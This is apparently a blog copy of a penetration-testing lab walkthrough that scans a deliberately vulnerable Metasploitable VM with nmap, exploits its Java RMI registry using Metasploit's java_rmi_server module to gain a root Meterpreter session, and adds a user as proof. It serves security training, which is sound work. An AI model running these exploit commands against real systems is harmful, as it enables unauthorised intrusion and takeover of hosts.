Section 0. Background Information |
- Metasploitable
- Metasploitable is an intentionally vulnerable Linux virtual machine.
- This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
- http://www.offensive-security.com/metasploit-unleashed/Metasploitable
- Pre-Requisite Lab
- Metasploitable : Lesson 1: Downloading and Configuring
- What RMI?
- The RMI protocol makes use of two other protocols for its on-the-wire format: Java Object Serialization and HTTP. The Object Serialization protocol is used to marshal call and return data. The HTTP protocol is used to "POST" a remote method invocation and obtain return data when circumstances warrant. Each protocol is documented as a separate grammar. Nonterminal symbols in production rules may refer to rules governed by another protocol (either Object Serialization or HTTP). When a protocol boundary is crossed, subsequent productions use that embedded protocol.
- Lab Notes
- In this lab we will do the following:
- Run an intense NMAP Scan on the Metasploitable VM
- Search for the RMI Service
- Exploit the RMI Server and obtain root.
- In this lab we will do the following:
- Legal Disclaimer - Bài lab chỉ dùng cho môi trường học tập
Section 1. Start Up the Metasploitable VM |
- Start Up VMWare Player
- Instructions:
- Click the Start Button
- Type Vmplayer in the search box
- Click on Vmplayer
- Instructions:
- Open a Virtual Machine
- Instructions:
- Click on Open a Virtual Machine
- Instructions:
- Open the Metasploitable VM
- Instructions:
- Navigate to where the Metasploitable VM is located
- Click on on the Metasploitable VM
- Click on the Open Button
- Instructions:
- Edit the Metasploitable VM
- Instructions:
- Select Metasploitable2-Linux VM
- Click Edit virtual machine settings
- Instructions:
- Edit the Metasploitable VM
- Instructions:
- Click on "Network Adapter NAT"
- Select the radio button "Bridged: Connected directly to the physical network"
- Click on the OK button
- Warning:
- By changing from NAT to Bridged opens the VM and network up to potential attacks.
- To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, (3) use an ACL to not allow traffic into your network, etc.
- Instructions:
- Play the Metasploitable VM
- Instructions:
- Click on the Metasploitable VM
- Click on Play virtual machine
- Instructions:
Section 2. Determine Metasploitable IP Address |
- Logging into Metasploitable
- Instructions
- Username: msfadmin
- Password: msfadmin or whatever you changed it to in lesson 1.
- Instructions
- Change the msfadmin password
- Instructions:
- ifconfig -a
- Note(FYI):
- This is the IP Address of the Victim Machine.
- My IP Address is 192.168.1.106.
- Record your IP Address.
- Instructions:
Section 4. Start Up the BackTrack5R1 VM |
- Start Up VMWare Player
- Instructions:
- Click the Start Button
- Type Vmplayer in the search box
- Click on Vmplayer
- Instructions:
- Open a Virtual Machine
- Instructions:
- Click on Open a Virtual Machine
- Instructions:
- Open the BackTrack5R1 VM
- Instructions:
- Navigate to where the BackTrack5R1 VM is located
- Click on on the BackTrack5R1 VM
- Click on the Open Button
- Instructions:
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
- Instructions:
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
- Instructions:
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
- Instructions:
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Instructions:
- Bring up the GNOME
- Instructions:
- Type startx
- Instructions:
- Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Instructions:
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address 192.168.1.111
- In your case, it will probably be different.
- This is the machine that will be use to attack the victim machine (Metasploitable).
- Instructions:
Section 5. Scanning the Victim with NMAP |
- Run Intense NMAP Scan on the Metasploitable VM
- Note(FYI):
- Replace 192.168.1.106 with the Metasploitable IP Address obtained from (Section 2, Step 2).
- This intense NMAP scan could take 3 to 5 minutes to run.
- Instructions:
- nmap -p 1-65535 -T4 -A -v 192.168.1.106 2>&1 | tee /var/tmp/scan.txt
- Note(FYI):
- Looking for rpcinfo, nfs and ssh
- Instructions:
- cd /var/tmp
- grep -i rmi scan.txt
- Note(FYI):
- rmiregistry server runs on port 1099 on TCP.
- Instructions:
Section 6. Exploit the RMI Registry Server |
- Start the Metasploit Console
- Instructions:
- msfconsole
- Instructions:
- Use Java RMI Server Exploit
- Instructions:
- search java_rmi
- use exploit/multi/misc/java_rmi_server
- Instructions:
- Set RHOST (Victim IP Address)
- Instructions:
- show options
- set RHOST 192.168.1.106
Note(FYI): - Replace 192.168.1.106 with the Metasploitable IP Address obtained from (Section 2, Step 2).
- Instructions:
- Exploit
- Instructions:
- exploit
Note(FYI): - Now you should see a Meterpreter session opened between BackTrack to Metasploitable.
- Instructions:
- Help
- Instructions:
- help
Note(FYI): - The help command will provide all the available options that can be used for this particular exploit.
- Instructions:
- Got root?
- Instructions:
- ifconfig
- getuid
Note(FYI): - Very kool, you should see that you now have root access.
- Instructions:
Section 7. Proof of Lab |
- Proof of Lab
- Instructions:
- shell
- whoami
- useradd -m -d /home/student -c "Student Hacker" -s /bin/bash student
- grep student /etc/passwd
- date
- echo "Your Name"
- Put in your actual name in place of "Your Name"
- e.g., echo "John Gray"
- Proof of Lab Instructions
- Press the <Ctrl> and <Alt> key at the same time.
- Press the <PrtScn> key.
- Paste into a word document
- Upload to website Www.AnToanThongTin.Edu.VN
- Instructions:
Không có nhận xét nào:
Đăng nhận xét